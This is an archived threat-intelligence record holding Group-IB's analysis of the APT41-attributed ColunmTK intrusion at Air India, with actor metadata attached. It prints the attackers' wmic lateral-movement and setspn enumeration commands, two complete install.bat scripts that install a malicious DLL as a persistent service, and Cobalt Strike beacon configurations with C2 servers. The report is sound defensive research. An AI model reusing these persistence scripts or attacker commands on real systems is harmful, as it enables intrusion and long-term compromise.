{
	"id": "8561e7ef-30b6-4ff7-9b40-24a0111458ca",
	"created_at": "2026-04-06T00:08:22.867399Z",
	"updated_at": "2026-04-10T03:32:21.165436Z",
	"deleted_at": null,
	"sha1_hash": "fb7f9a83b11ab443479a3eb87a76d25600cece45",
	"title": "Big airline heist",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4540991,
	"plain_text": "Big airline heist\r\nArchived: 2026-04-05 13:22:35 UTC\r\nUPDATE: This blog post was updated on August 12, 2021 at the request of a third party.\r\nExecutive summary\r\nIn late May, Air India reported a massive passenger data breach. The announcement was preceded by data breaches at various airline companies, including Singapore Airlines and Malaysia Airlines. According to public source data, these airlines use services of the same IT service provider. The media suggested the airline industry was facing “a coordinated supply chain attack”. Air India was the first carrier to reveal more details about its security breach.\r\nThe data revealed by Air India suggested that the massive data breach that affected multiple carriers was a result of the compromise of the airline’s IT service provider. That announcement prompted Group-IB Threat Intelligence analysts to look closer at the attack.\r\nUsing its external threat hunting tools, Group-IB’s Threat Intelligence team then discovered another previously unknown cyberattack on Air India and attributed it with moderate confidence to the Chinese nation-state threat actor known as APT41. The campaign was codenamed ColunmTK.\r\nIn this blog post you will find:\r\nPreviously unknown details about the ColunmTK campaign\r\nEvidence of compromised workstations and exfiltration of 200 MB of data from Air India’s network\r\nDescriptions of TTPs used during the ColunmTK campaign\r\nConnections between APT41 and the infrastructure used during the ColunmTK campaign\r\nThe potential ramifications of this incident for the entire airline industry and for carriers that might yet discover traces of ColunmTK in their networks are significant. To help companies detect and hunt for ColunmTK, we have provided a full list of indicators of compromise (IOCs) that we retrieved. MITRE ATT\u0026CK, MITRE Shield, and recommendations are available at the end of this blog post.\r\nGroup-IB’s Threat Intelligence team informed CERT India and Air India of its findings so that they can take the necessary steps to mitigate the threat.\r\nBackground\r\nOn May 21, Air India, India’s flag carrier, published an official statement on their website about a data breach. The announcement revealed that the breach was caused by a February incident at the airline’s IT service provider, which is responsible for processing customers’ personally identifiable information (PII). However, that statement has since been corrected. It came to light that the cyberattack on this IT service provider affected 4,500,000 data subjects globally, including data related to Air India’s customers.\r\nhttps://www.group-ib.com/blog/colunmtk-apt41/\r\nPage 1 of 15\r\nShortly after Air India’s public announcement, the database allegedly related to their security breach was put up for sale on an underground market at USD 3,000.\r\nAccording to Group-IB’s Threat Intelligence system, the alleged database was published on a fraudulent resource known for reselling data that has been published on various data-leak websites. Because the database had never surfaced anywhere on the dark web, nor in the public domain, Group-IB researchers considered it fake and decided to instead look deeper. They discovered that the post about Air India’s alleged data had nothing to do with what happened in reality. Group-IB’s Threat Intelligence team soon realized that in this other attack on Air India they were dealing with a sophisticated nation-state threat actor, rather than another financially motivated cybercriminal group.\r\nCompromise of Air India’s network\r\nIn mid-February 2021, Group-IB’s Threat Intelligence system detected infected devices that were part of Air India’s computer network. Starting from at least February 23, 2021, a device inside the company’s network communicated with a server with the IP address 185[.]118[.]166[.]66. According to Group-IB’s Network Graph, this server has hosted Cobalt Strike, a popular post-exploitation framework, since December 11, 2020 (we will come back to it a little later).\r\nLifetime of a Cobalt Strike tag in Group-IB’s Network Graph\r\nThe patient zero that started communicating with the C\u0026C server was a device named «SITASERVER4» with the local IP address 172[.]16[.]11[.]103, managed by Air India.\r\nAfter the attackers established persistence in the network and obtained passwords, they began moving laterally. The threat actor collected information inside the local network, including names of network resources and their addresses.\r\nBelow are examples of commands that were used for lateral movement:\r\nDate | Device name | Command\r\n03/02/21 06:43 PM | WEBSERVER3 | run: wmic /node:172[.]16[.]2[.]114 /user:test\\\\administrator /password:[REDACTED] process call create “c:\\\\users\\\\Public\\\\install.bat”\r\n03/03/21 02:05 AM | AILOAPOTHDT076 | ping AILCCUALHSV002\r\nThe results of some commands:\r\nHost: AILCCUALHSV002 – 172[.]24[.]3[.]24\r\nShell command: ipconfig/all\r\nCommand result:\r\nWindows IP Configuration\r\nHost Name . . . . . . . . . . . . : AILCCUALHSV002\r\nPrimary Dns Suffix . . . . . . . : ad[.]airindia[.]in\r\nNode Type . . . . . . . . . . . . : Hybrid\r\nIP Routing Enabled. . . . . . . . : No\r\nWINS Proxy Enabled. . . . . . . . : No\r\nDNS Suffix Search List. . . . . . : ad[.]airindia[.]in\r\nHost: AILCCUALHSV001 – 172[.]24[.]3[.]22\r\nShell command: setspn -T ad[.]airindia[.]in -Q */* | findstr SQL\r\nCommand result:\r\nMSSQLSvc/AILDELCCPDT011.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELCCPDT011.ad[.]airindia[.]in:1433\r\nMSSQLSvc/AILDELCCPDT017.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELCCPDT017.ad[.]airindia[.]in:1433\r\nMSSQLSvc/AILDELCCPDT018.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELCCPDT018.ad[.]airindia[.]in:1433\r\nMSSQLSvc/AASBOMCGODT009.ad[.]airindia[.]in:1433\r\nMSSQLSvc/AILDELCCPDT020.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELCCPDT020.ad[.]airindia[.]in:1433\r\nMSSQLSvc/AILDELCCPDT023.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELCCPDT032.ad[.]airindia[.]in:1433\r\nMSSQLSvc/AILDELCCPDT032.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELCCPDB01.ad[.]airindia[.]in:17001\r\nMSSQLSvc/AILDELCCPDB01.ad[.]airindia[.]in:PDWTDSSERVER\r\nMSSQLSvc/MAAAUCDT614.ad[.]airindia[.]in\r\nMSSQLSvc/AILMAAAUCDT614.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELGSDDT406.ad[.]airindia[.]in\r\nMSSQLSvc/AILBOMAPTDT107.ad[.]airindia[.]in\r\nMSSQLSvc/TRCOM.ad[.]airindia[.]in:1433\r\nMSSQLSvc/ATLDELGSDDT027.ad[.]airindia[.]in\r\nMSSQLSvc/AILOAPDITDT008.ad[.]airindia[.]in:1433\r\nMSSQLSvc/AILOAPDITDT008.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELCCPDT041.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELCCPDT041.ad[.]airindia[.]in:1433\r\nMSSQLSvc/AILMAAAUCDT179.ad[.]airindia[.]in\r\nThe attackers exfiltrated NTLM hashes and plain-text passwords from local workstations using hashdump and mimikatz. The attackers tried to escalate local privileges with the help of BadPotato malware. BadPotatoNet4.exe was uploaded to one of the devices inside the victim’s network under the name SecurityHealthSystray.exe.\r\nAccording to our data, at least 20 devices from Air India’s network were compromised during the lateral movement stage. The attackers used DNS TXT requests to connect the bots to the C\u0026C server. The following domains were used for DNS tunneling:\r\nns2[.]colunm[.]tk\r\nns1[.]colunm[.]tk\r\nThe name of the campaign, ColunmTK, is derived from these initially discovered domains.\r\nIt was also found that the attackers extracted 233,390,032 bytes of data from the following devices:\r\nSITASERVER4\r\nAILCCUALHSV001\r\nAILDELCCPOSCE01\r\nAILDELCCPDB01\r\nWEBSERVER3\r\nAccording to Group-IB’s Threat Intelligence data, the compromised devices were located in different subnets, which may indicate that the compromise affected various segments of Air India’s network.\r\nWhile the initial attack vector remains unknown, according to Group-IB’s records, the attack on Air India lasted for at least 2 months and 26 days. It took the attackers 24 hours and 5 minutes to spread Cobalt Strike beacons to other devices in the airline’s network.\r\nColunmTK Timeline\r\nConnections with APT41\r\nGroup-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. APT41, also known as WICKED SPIDER (PANDA), Winnti Umbrella, and BARIUM, is believed to have been engaging in state-sponsored espionage in China’s interests as well as committing financially motivated cybercrimes. According to Group-IB’s Threat Intelligence system, the threat actor has been active since at least 2007.\r\nAPT41 is known for stealing digital certificates for its cyber espionage operations. India is a frequent target of Chinese nation-state adversaries.\r\nWhen analyzing the network infrastructure of the C\u0026C server involved in the cyberattack against Air India, Group-IB’s Threat Intelligence system revealed that the threat actor used a specific SSL certificate, which was detected on five hosts only.\r\nIP address | Location | ASN | Organization\r\n185.118.164[.]198 | RU | AS44493 | Chelyabinsk-Signal LLC\r\n104.224.169[.]214 | US | AS19181 | IT7 Networks Inc\r\n45.61.136[.]199 | US | AS53667 | BL Networks\r\n185.118.166[.]66 | RU | AS44493 | Chelyabinsk-Signal LLC\r\n149.28.134[.]209 | SG | AS20473 | Vultr Holdings, LLC\r\nNetwork relations between hosts with a specific fingerprint presented in Group-IB’s Threat Intelligence system\r\nLet’s take a closer look at these five IP addresses.\r\nOne of them, 45[.]61[.]136[.]199, was attributed to APT41 (aka Barium) by Microsoft in their recent research.\r\nIt is worth looking at another IP address from the list: 104[.]224[.]169[.]214. This IP address was used as an A record for two domains: server04[.]dns04[.]com and service04[.]dns04[.]com. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK’s IP address 185[.]118[.]166[.]66. When analyzing the dns04[.]com subdomains, we found that these domains were parked at the IP address 127.0.0.1 on the same date: April 15, 2021. According to Group-IB researchers, APT41 usually parks their domains for some time at 127.0.0.1 after their campaigns are over.\r\nNetwork relations between hosts parked at 127.0.0.1. Source: Group-IB Threat Intelligence\r\nAnother interesting domain is service[.]dns22[.]ml. This domain shared the SSL certificate b3038101fd0e8b11c519f739f12c7e9b60234d3b with ColunmTK’s IP address and was parked at 127.0.0.1 on January 15, 2021. Security researchers found that the IP address 104[.]224[.]169[.]214 was used as the IP address for a shellcode loader in APT41’s earlier campaigns, in which the domain service[.]dns22[.]ml was also used.\r\nGroup-IB researchers discovered a file named “Install.bat” (SHA1: 7185bb6f1dddca0e6b5a07b357529e2397cdee44). The file was uploaded by the attackers to some of the compromised devices inside Air India’s network as part of the ColunmTK campaign. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers.\r\nIn both cases, the files were used to establish persistence in the network. The files are very similar in the way they launch a DLL file as a service and create keys in the registry.\r\nThe contents of the file “install.bat” from APT41’s This is Not a Test campaign:\r\n@echo off\r\nset \"WORK_DIR=C:\\Windows\\System32\"\r\nset \"DLL_NAME=storesyncsvc.dll\"\r\nset \"SERVICE_NAME=StorSyncSvc\"\r\nset \"DISPLAY_NAME=Storage Sync Service\"\r\nset \"DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync rel\r\nsc stop %SERVICE_NAME%\r\nsc delete %SERVICE_NAME%\r\nmkdir %WORK_DIR%\r\ncopy \"%dp0%DLL_NAME%\" \"%WORK_DIR%\" /Y\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v \"%SERVICE_NAME%\" /t REG_MULTI_S\r\nsc create \"%SERVICE_NAME%\" binPath= \"%SystemRoot%\\system32\\svchost.exe -k %SERVICE_NAME%\" type= share\r\nSC failure \"%SERVICE_NAME%\" reset= 86400 actions= restart/60000/restart/60000/restart/60000\r\nsc description \"%SERVICE_NAME%\" \"%DESCRIPTION%\"\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /v \"ServiceDll\" /t REG_EXPA\r\nnet start \"%SERVICE_NAME%\"\r\nThe contents of the file “install.bat” from the ColunmTK campaign:\r\n@echo off\r\nset \"WORK_DIR=c:\\Windows\\System32\"\r\nset \"DLL_NAME=SecurityHealthSystray.dll\"\r\nset \"SERVICE_NAME=COMSysConfig\"\r\nset \"DISPLAY_NAME=COM+ Update Service\"\r\nset \"DESCRIPTION=\"\r\nsc stop %SERVICE_NAME%\r\nsc delete %SERVICE_NAME%\r\nmkdir %WORK_DIR%\r\ncopy \"%dp0%DLL_NAME%\" \"%WORK_DIR%\" /Y\r\ndp0SecurityHealthSystra.ocx\" \"%WORK_DIR%\\SecurityHealthSystra.ocx\" /Y\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v \"%SERVICE_NAME%\" /t REG_MULTI_S\r\nsc create \"%SERVICE_NAME%\" binPath= \"%SystemRoot%\\system32\\svchost.exe -k %SERVICE_NAME%\" type= share\r\nSC failure \"%SERVICE_NAME%\" reset= 86400 actions= restart/60000/restart/60000/restart/60000\r\nsc description \"%SERVICE_NAME%\" \"%DESCRIPTION%\"\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /v \"ServiceDll\" /t REG_EXPA\r\nnet start \"%SERVICE_NAME%\"\r\nGroup-IB researchers believe with moderate confidence that the ColunmTK campaign against Air India was carried out by the Chinese nation-state threat actor APT41.\r\nAttribution of the ColunmTK campaign against Air India to APT41.\r\nColunmTK MITRE ATT\u0026CK and MITRE SHIELD\r\nBelow are indicators that were used in this campaign as well as MITRE ATT\u0026CK mapping and a corresponding list of mitigation solutions. Companies should use MITRE ATT\u0026CK to better prepare for attacks and know what techniques are needed to mitigate security risks associated with this threat actor.\r\nIndicators of compromise\r\nNetwork indicators:\r\n185.118.164[.]198\r\n104.224.169[.]214\r\n45.61.136[.]199\r\n185.118.166[.]66\r\n149.28.134[.]209\r\ncolunm[.]tk\r\nFile indicators (MD5): the full list of file hashes is given in the source report at https://www.group-ib.com/blog/colunmtk-apt41/\r\nBeacon configuration from 185.118.166[.]66\r\n\"post-get.verb\" : \"\",\r\n\"process-inject-stub\" : \"d5nX4wNnwCo18Wx3jr4tPg==\",\r\n\"http-get.uri\" : \"cs[.]colunm[.]tk,/dpixel\",\r\n\"http-get.server.output\" : \"\",\r\n\"post-ex.spawnto_x64\" : \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n\"post-ex.spawnto_x86\" : \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n\"cryptoscheme\" : 0,\r\n\"process-inject-transform-x64\" : \"\",\r\n\"process-inject-transform-x86\" : \"\",\r\n\"maxdns\" : 255,\r\n\"process-inject-min_alloc\" : 0,\r\n\"http-post.client\" : \"\u0026Content-Type: application/octet-streamid\",\r\n\"dns_sleep\" : 0,\r\n\"ssl\" : true,\r\n\"SSH_Password_Pubkey\" : \"\",\r\n\"http-post.uri\" : \"/submit.php\",\r\n\"Proxy_UserName\" : \"\",\r\n\"cookieBeacon\" : 1,\r\n\"CFGCaution\" : 0,\r\n\"process-inject-start-rwx\" : 64,\r\n\"spawto\" : \"\",\r\n\"SSH_Host\" : \"\",\r\n\"stage.cleanup\" : 0,\r\n\"SSH_Username\" : \"\",\r\n\"watermark\" : 305419896,\r\n\"process-inject-use-rwx\" : 64,\r\n\"dns_idle\" : 0,\r\n\"sleeptime\" : 60000,\r\n\"dns\" : false,\r\n\"publickey\" : \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ\r\nCBkyCWDMC1Q6VqRZIY35+iU7KtrHy9+HnzzPxCetQ5toPMCqlwQEB9hj38O\r\nnrVdGJYcvb8X36PIo8JBQSIB+ejM0xYaWwWIoLYhG1CSUJPgLc24wjjkW3/2wB\r\nuLrgTuYxNeylf75fE6cQtSeimLeHp/XjyQPfYbUQgiCSqs7KSUwIDAQABAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAA==\",\r\n\"pipename\" : \"\",\r\n\"SSH_Password_Plaintext\" : \"\",\r\n\"Proxy_Password\" : \"\",\r\n\"Proxy_HostName\" : \"\",\r\n\"host_header\" : \"\",\r\n\"jitter\" : 0,\r\n\"killdate\" : 0,\r\n\"text_section\" : 0,\r\n\"port\" : 8443,\r\n\"shouldChunkPosts\" : 0,\r\n\"http-get.client\" : \"Cookie\",\r\n\"funk\" : 0,\r\n\"SSH_Port\" : 0,\r\n\"http-get.verb\" : \"GET\",\r\n\"proxy_type\" : 2,\r\n\"user-agent\" : \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MANM; MANM)\"\r\nBeacon configuration from 149.28.134[.]209\r\n{\r\n \"func\": 0,\r\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"DNS_sleep(ms)\": 0,\r\n \"HostHeader\": \"\",\r\n \"Maxdns\": 255,\r\n \"Proxy_AccessType\": \"2 (use IE settings)\",\r\n \"SpawnTo\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"binary.http-get.server.output\": \"AAAABAAAAAEAAA1NAAAAAgAADSYAAAANAAAADwAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"bUsesCookies\": \"True\",\r\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"Watermark\": 305419896,\r\n \"bProcInject_MinAllocSize\": 17500,\r\n \"bProcInject_StartRWX\": \"True\",\r\n \"HttpGet_Verb\": \"GET\",\r\n \"version\": \"4\",\r\n \"PipeName\": \"\",\r\n \"UserAgent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\r\n \"KillDate\": \"0\",\r\n \"HttpPost_Verb\": \"POST\",\r\n \"HttpPostChunk\": 0,\r\n \"textSectionEnd (0 if !sleep_mask)\": 154122,\r\n \"BeaconType\": \"8 (HTTPS)\",\r\n \"HttpGet_Metadata\": [\r\n \"Host: fortawesome.com\",\r\n \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\r\n \"Accept-Encoding: gzip, deflate\",\r\n \"Referer: https://fortawesome.com/\",\r\n \"_fortawesome_session=\",\r\n \"Cookie\"\r\n ],\r\n \"ProcInject_PrependAppend_x86\": \"AAAABJCQkJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"DNS_idle\": \"8.8.8.8\",\r\n \"ProcInject_AllocationMethod\": \"NtMapViewOfSection\",\r\n \"ProcInject_PrependAppend_x64\": \"AAAABJCQkJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"Jitter\": 37,\r\n \"SleepTime\": 1000,\r\n \"bStageCleanup\": \"True\",\r\n \"C2Server\": \"149.28.134.209,/users/sign_in\",\r\n \"MaxGetSize\": 1404878,\r\n \"CryptoScheme\": 0,\r\n \"PublicKey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCLWqwFbcEMqEaiaw6K1ORaRyQ62LPDVjE/Wb6tbstdNR2Y\r\n \"obfuscate_section\": \"AGACAFH9AgAAAAMAwKADAACwAwAwzgMAAAAAAAAAAAA=\",\r\n \"ProcInject_Execute\": [\r\n \"6\"\r\n ],\r\n \"ProcInject_Stub\": \"UGQyVORjQ+JF+/sEjjvVYA==\",\r\n \"bProcInject_UseRWX\": \"True\",\r\n \"HttpPost_Metadata\": [\r\n \"Host: fortawesome.com\",\r\n \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\r\n \"Accept-Encoding: gzip, deflate\",\r\n \"__uid\",\r\n \"remember_me=on\u0026authenticity_token=\"\r\n ],\r\n \"bCFGCaution\": \"False\",\r\n \"Port\": 443,\r\n \"HttpPostUri\": \"/signup/custom\"\r\n}\r\nSource: https://www.group-ib.com/blog/colunmtk-apt41/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.group-ib.com/blog/colunmtk-apt41/"
	],
	"report_names": [
		"colunmtk-apt41"
	],
	"threat_actors": [
		{
			"id": "49822165-5541-423d-8808-1c0a9448d588",
			"created_at": "2022-10-25T16:07:23.384093Z",
			"updated_at": "2026-04-10T02:00:04.575678Z",
			"deleted_at": null,
			"main_name": "Barium",
			"aliases": [
				"Brass Typhoon",
				"Pigfish",
				"Starchy Taurus"
			],
			"source_name": "ETDA:Barium",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"Barlaiy",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Destroy RAT",
				"DestroyRAT",
				"Kaba",
				"Korplug",
				"POISONPLUG",
				"PlugX",
				"RbDoor",
				"RedDelta",
				"RibDoor",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Winnti",
				"Xamtrav",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "273a41a8-5115-4f55-865f-0960a765f18c",
			"created_at": "2022-10-25T16:07:24.397947Z",
			"updated_at": "2026-04-10T02:00:04.974605Z",
			"deleted_at": null,
			"main_name": "Wicked Spider",
			"aliases": [
				"APT 22",
				"Bronze Export",
				"Bronze Olive",
				"Wicked Spider"
			],
			"source_name": "ETDA:Wicked Spider",
			"tools": [
				"Agent.dhwf",
				"AngryRebel",
				"Destroy RAT",
				"DestroyRAT",
				"DoublePulsar",
				"EternalBlue",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"Kaba",
				"Korplug",
				"Moudour",
				"Mydoor",
				"PCRat",
				"PlugX",
				"RedDelta",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Xamtrav"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "00e7a6ed-1880-4391-b0b9-1f46fae0e5cc",
			"created_at": "2025-08-07T02:03:24.591024Z",
			"updated_at": "2026-04-10T02:00:03.717645Z",
			"deleted_at": null,
			"main_name": "BRONZE EXPORT",
			"aliases": [
				"TG-3279 ",
				"Wicked Spider "
			],
			"source_name": "Secureworks:BRONZE EXPORT",
			"tools": [
				"Conpee",
				"PlugX",
				"PwDump"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434102,
	"ts_updated_at": 1775791941,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fb7f9a83b11ab443479a3eb87a76d25600cece45.pdf",
		"text": "https://archive.orkl.eu/fb7f9a83b11ab443479a3eb87a76d25600cece45.txt",
		"img": "https://archive.orkl.eu/fb7f9a83b11ab443479a3eb87a76d25600cece45.jpg"
	}
}